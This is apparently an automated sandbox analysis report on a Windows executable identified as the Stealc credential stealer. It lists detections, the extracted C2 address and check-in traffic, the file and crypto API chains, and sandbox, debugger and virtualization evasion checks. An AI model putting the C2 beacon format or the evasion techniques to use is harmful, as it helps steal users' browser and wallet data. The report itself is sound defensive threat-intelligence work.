Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1541160
MD5:	efb3596cf052ae112e2b81b16870436e
SHA1:	266b9c7ace3a1371ef5e87eb55f4e65ecb5e2d57
SHA256:	73de19773f529e65c1935196f7eb61206dad5ad17783a4412543c4bf0325bdc6
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.910000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0091C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00919AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00919AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00917240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00917240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00919B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00919B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00928EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00928EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009238B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00924910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0091DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0091E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0091ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00924570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0091F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00923EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009116D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0091DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0091BE70

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBGHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 37 37 43 37 42 31 44 32 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="hwid"6977C7B1D24A563484146------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="build"doma------EBAFBGIDHCBFHIECFCBG--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00914880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00914880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBGHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 37 37 43 37 42 31 44 32 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="hwid"6977C7B1D24A563484146------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="build"doma------EBAFBGIDHCBFHIECFCBG--

Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0
Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/G
Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C260C7	0_2_00C260C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8	0_2_00CE29D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDD9A4	0_2_00CDD9A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9C936	0_2_00B9C936
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDF96C	0_2_00CDF96C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB397A	0_2_00BB397A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C60115	0_2_00C60115
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2A927	0_2_00C2A927
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE4AAA	0_2_00CE4AAA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B94BE1	0_2_00B94BE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6248D	0_2_00C6248D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDA476	0_2_00CDA476
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA8D08	0_2_00BA8D08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE0E93	0_2_00CE0E93
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5EEA2	0_2_00D5EEA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8860C	0_2_00B8860C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF3E4A	0_2_00BF3E4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C10F57	0_2_00C10F57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDBF1E	0_2_00CDBF1E

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 009145C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: enilkfvu ZLIB complexity 0.9950591473636087

Source: file.exe, 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00928680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00928680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00923720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00923720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\VQR1X6ZM.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1836032 > 1048576

Source: file.exe

Static PE information: Raw size of enilkfvu is bigger than: 0x100000 < 0x19a200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.910000.0.unpack :EW;.rsrc :W;.idata :W; :EW;enilkfvu:EW;cjtkqast:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;enilkfvu:EW;cjtkqast:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00929860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1c2667 should be: 0x1c4d05

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: enilkfvu
Source: file.exe	Static PE information: section name: cjtkqast
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C260C7 push 0108C592h; mov dword ptr [esp], esi	0_2_00C26316
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCE8D9 push esi; mov dword ptr [esp], ebx	0_2_00DCE90F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC18C4 push eax; mov dword ptr [esp], ecx	0_2_00DC18DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE3090 push esi; mov dword ptr [esp], ebx	0_2_00BE3180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE3090 push edi; mov dword ptr [esp], esi	0_2_00BE3184
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE3090 push ebp; mov dword ptr [esp], ecx	0_2_00BE31B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9D848 push ebp; mov dword ptr [esp], 53967580h	0_2_00D9D8A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092B035 push ecx; ret	0_2_0092B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCB06C push 52FB224Ch; mov dword ptr [esp], edx	0_2_00DCB0DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DFD03D push esi; mov dword ptr [esp], 1F9A9466h	0_2_00DFD0DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7683E push ecx; mov dword ptr [esp], edx	0_2_00D7686F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEB02D push 192B211Ch; mov dword ptr [esp], ecx	0_2_00DEB03F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEB02D push ebx; mov dword ptr [esp], ebp	0_2_00DEB17E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEB02D push eax; mov dword ptr [esp], esi	0_2_00DEB1B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEB02D push 7B17890Dh; mov dword ptr [esp], eax	0_2_00DEB1E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEB02D push esi; mov dword ptr [esp], esp	0_2_00DEB1E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D78021 push edi; mov dword ptr [esp], esp	0_2_00D7807A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D78021 push 435E7A54h; mov dword ptr [esp], ecx	0_2_00D7813B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D78021 push edi; mov dword ptr [esp], edx	0_2_00D7817D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEC1C8 push 12D63B6Ah; mov dword ptr [esp], edi	0_2_00CEC1F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEC1C8 push 5765917Fh; mov dword ptr [esp], esi	0_2_00CEC275
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEA9D5 push ebx; mov dword ptr [esp], ecx	0_2_00DEAA1A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push 24F38F98h; mov dword ptr [esp], ebp	0_2_00CE29FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push ecx; mov dword ptr [esp], 377D5128h	0_2_00CE2A01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push esi; mov dword ptr [esp], edi	0_2_00CE2A89
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push esi; mov dword ptr [esp], ebx	0_2_00CE2B27
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push 0B20A511h; mov dword ptr [esp], esi	0_2_00CE2B68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push esi; mov dword ptr [esp], edx	0_2_00CE2C02
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push 2DA0F3D7h; mov dword ptr [esp], eax	0_2_00CE2C86
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push 5F6B3B2Dh; mov dword ptr [esp], esi	0_2_00CE2CA6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE29D8 push 662C787Ah; mov dword ptr [esp], edx	0_2_00CE2CE1

Source: file.exe

Static PE information: section name: enilkfvu entropy: 7.954611061577171

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00929860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD530 second address: CDD534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD534 second address: CDD547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jno 00007F1674F90E16h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD547 second address: CDD564 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DACh 0x00000008 pushad 0x00000009 jl 00007F1675279DA6h 0x0000000f jns 00007F1675279DA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBFBE second address: CEBFC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBFC4 second address: CEBFCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBFCA second address: CEBFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC173 second address: CEC185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC185 second address: CEC197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEAFB second address: CEEB0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEB0F second address: CEEB7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 35D15B89h 0x00000010 mov dword ptr [ebp+122D347Ch], esi 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F1674F90E18h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 add ecx, 2D153BBAh 0x00000038 movzx ecx, bx 0x0000003b push 00000000h 0x0000003d mov dword ptr [ebp+122D1963h], ebx 0x00000043 push 00000003h 0x00000045 jl 00007F1674F90E1Ch 0x0000004b mov dword ptr [ebp+122D1904h], ecx 0x00000051 push E3AD49C1h 0x00000056 js 00007F1674F90E20h 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEC2B second address: CEEC35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F1675279DA6h 0x0000000a rdtsc
